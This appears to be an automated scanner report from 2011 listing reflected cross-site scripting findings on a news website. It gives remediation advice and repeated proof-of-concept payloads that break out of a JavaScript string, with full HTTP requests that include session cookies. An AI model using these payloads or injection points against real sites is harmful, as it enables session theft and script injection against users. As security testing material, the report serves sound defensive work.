Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a549f'%3balert(1)//d1c44b68f45 was submitted in the REST URL parameter 1. This input was echoed as a549f';alert(1)//d1c44b68f45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a549f'%3balert(1)//d1c44b68f45/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:57 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70073
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 199a9'%3balert(1)//5fe057c6bfe was submitted in the REST URL parameter 1. This input was echoed as 199a9';alert(1)//5fe057c6bfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /autos199a9'%3balert(1)//5fe057c6bfe/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:18 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70078
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae234'%3balert(1)//9537e159f9b was submitted in the REST URL parameter 2. This input was echoed as ae234';alert(1)//9537e159f9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /autos/index.htmlae234'%3balert(1)//9537e159f9b HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:35 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70078
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecba4'%3balert(1)//eeca0e3c567 was submitted in the REST URL parameter 1. This input was echoed as ecba4';alert(1)//eeca0e3c567 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /classifiedsecba4'%3balert(1)//eeca0e3c567/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:35 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70084
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a6a'%3balert(1)//abf1b20a94f was submitted in the REST URL parameter 2. This input was echoed as e2a6a';alert(1)//abf1b20a94f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /classifieds/index.htmle2a6a'%3balert(1)//abf1b20a94f HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:36:55 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70084
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96572'%3balert(1)//66a9a4c656b was submitted in the REST URL parameter 1. This input was echoed as 96572';alert(1)//66a9a4c656b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico96572'%3balert(1)//66a9a4c656b HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:26:18 GMT Server: Apache Keep-Alive: timeout=3, max=998 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70202
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fa49'%3b43b392f6eda was submitted in the REST URL parameter 1. This input was echoed as 4fa49';43b392f6eda in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico965724fa49'%3b43b392f6eda/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:47 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70079
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42b65'%3balert(1)//cc9739daf6a was submitted in the REST URL parameter 1. This input was echoed as 42b65';alert(1)//cc9739daf6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums42b65'%3balert(1)//cc9739daf6a/abuse!default.jspa HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:43 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70089
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 967e5'%3balert(1)//609b5f09b6 was submitted in the REST URL parameter 1. This input was echoed as 967e5';alert(1)//609b5f09b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums967e5'%3balert(1)//609b5f09b6/communityjs/44?forum=13&key=2748c8d6e1b10496a67bf33d97fa3d8e HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/news/national/2011/02/08/2011-02-08_matthew_hoffman_killer_who_hid_bodies_in_hollowedout_tree_details_crime_in_chill.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7; __vrf=3k7r5l65ggtu5gva; sto-id-sg-nydnapp-8080=CBADAKAK; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189499544:ss=1297189499544; zvents_tracker_sid=12971859055740.8106075366958976; __qca=P0-1704281983-1297185912293
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:26:04 GMT Server: Apache Keep-Alive: timeout=3, max=999 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70211
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3a5f'%3balert(1)//87f90d2373b was submitted in the REST URL parameter 1. This input was echoed as b3a5f';alert(1)//87f90d2373b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumsb3a5f'%3balert(1)//87f90d2373b/forum.jspa HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:24:38 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70092
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30493'%3balert(1)//8b6d10d85d4 was submitted in the REST URL parameter 1. This input was echoed as 30493';alert(1)//8b6d10d85d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums30493'%3balert(1)//8b6d10d85d4/popular-communityjs HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:24:08 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70101
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2c5b'%3balert(1)//729fb7c0d7b was submitted in the REST URL parameter 1. This input was echoed as f2c5b';alert(1)//729fb7c0d7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumsf2c5b'%3balert(1)//729fb7c0d7b/thread.jspa HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:24:58 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70084
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2431'%3bc432a46231f was submitted in the REST URL parameter 1. This input was echoed as e2431';c432a46231f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gossipe2431'%3bc432a46231f/2011/02/08/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:09 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70084
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce86e'%3b16f413446c was submitted in the REST URL parameter 2. This input was echoed as ce86e';16f413446c in the application's response.
